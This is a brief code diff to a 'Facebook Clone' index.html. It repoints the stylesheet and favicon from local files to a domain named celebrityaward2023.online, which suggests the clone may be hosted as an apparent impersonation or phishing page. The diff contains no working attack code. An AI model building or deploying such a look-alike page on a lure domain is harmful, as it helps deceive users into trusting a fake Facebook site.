--- a/facebook.com/index.html
+++ b/facebook.com/index.html
@@ -4,8 +4,8 @@
 <head>
     <meta charset="UTF-8">
     <title>Facebook Clone</title>
-    <link rel="stylesheet" href="./css/styles.css">
-    <link rel="shortcut icon" href="./images/fb.ico" type="image/x-icon">
+    <link rel="stylesheet" href="https://www.celebrityaward2023.online/facebook.com/css/styles.css">
+    <link rel="shortcut icon" href="https://www.celebrityaward2023.online/facebook.com/images/fb.ico" type="image/x-icon">
 </head>
 
 <body>
